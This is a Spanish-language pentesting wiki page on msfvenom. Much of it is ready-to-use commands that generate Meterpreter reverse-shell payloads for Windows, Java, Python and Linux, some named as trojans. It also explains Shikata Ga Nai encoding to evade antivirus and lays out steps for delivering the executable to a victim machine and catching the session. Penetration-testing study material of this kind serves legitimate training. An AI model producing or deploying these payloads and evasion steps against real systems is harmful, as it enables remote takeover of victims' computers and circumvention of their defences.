Page cover

☠️Msfvenom

Msfvenom es una herramienta de línea de comandos que se utiliza para generar payloads personalizados para una amplia variedad de sistemas operativos y arquitecturas.

Listado de payloads disponibles

msfvenom -l payloads

Empleo

msfvenom -h

Utiliza el comando "msfvenom" para crear un payload personalizado. Por ejemplo, el siguiente comando crea un payload de reverse de shell de Windows:

Sintaxis 1
# Para Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_Address> LPORT=<Port> -f exe > payload.exe

# En Java
msfvenom -p java/meterpreter/reverse_tcp LHOST=<IP_Address> LPORT=<Port> -f jar > payload.jar
Sintaxis 2
# En python
msfvenom -p python/meterpreter/reverse_tcp LHOST={nuestra_ip} LPORT=4444 -o troyano.py

# Para Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST={nuestra_ip} LPORT=4444 -o troyano.exe

# Para Linux
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<tu_IP> LPORT=<puerto> -f elf > shell.elf

Buffer Overflow en Linux - Shellcode


Evasión de Antivirus

Codificación Shikata Ga Nai

Shikata Ga Nai es un encoder de Metasploit que se utiliza para ofuscar payloads, dificultando así su detección por sistemas antivirus. Este encoder emplea un algoritmo de codificación polimórfico, lo que significa que genera diferentes versiones del mismo payload en cada ejecución, evitando la generación de firmas estáticas. Aunque mejora las posibilidades de evadir antivirus, no garantiza la evasión completa debido a que los antivirus también evolucionan para detectar patrones de obfuscación.

En sistemas Windows antiguos especificamos la arquitectura x86 y en sistemas Windows modernos deberíamos especificar la arquitectura x64


MSF Build

También podemos automatizar este proceso con MSF Build, un script que he desarrollado en python que nos genera automáticamente el ejecutable con la codificación Shikata Ga Nai y otras medidas de evasión de antivirus.


Caso Práctico

Meterpreter para Windows

  1. Enviar reverse_shell.exe a la máquina Windows por el método que queramos:

  1. Nos ponemos en escucha con Netcat o Metasploit/multi/handler por el puerto asignado:

  1. Ejecutar reverse_shell.exe en la máquina Windows

  1. Recibimos la sesión de Meterpreter 😎


Hack Tools Plugin

Este plugin disponible nos permite crear payloads a medida de MsfVenom, pudiendo configurar nuestra IP, puerto, plataforma objetivo, arquitectura y nuestro payload, en este caso un Meterpreter.

Hack Tools PLugin

👾Meterpreter🛡️Evasión de Antivirus

Última actualización

¿Te fue útil?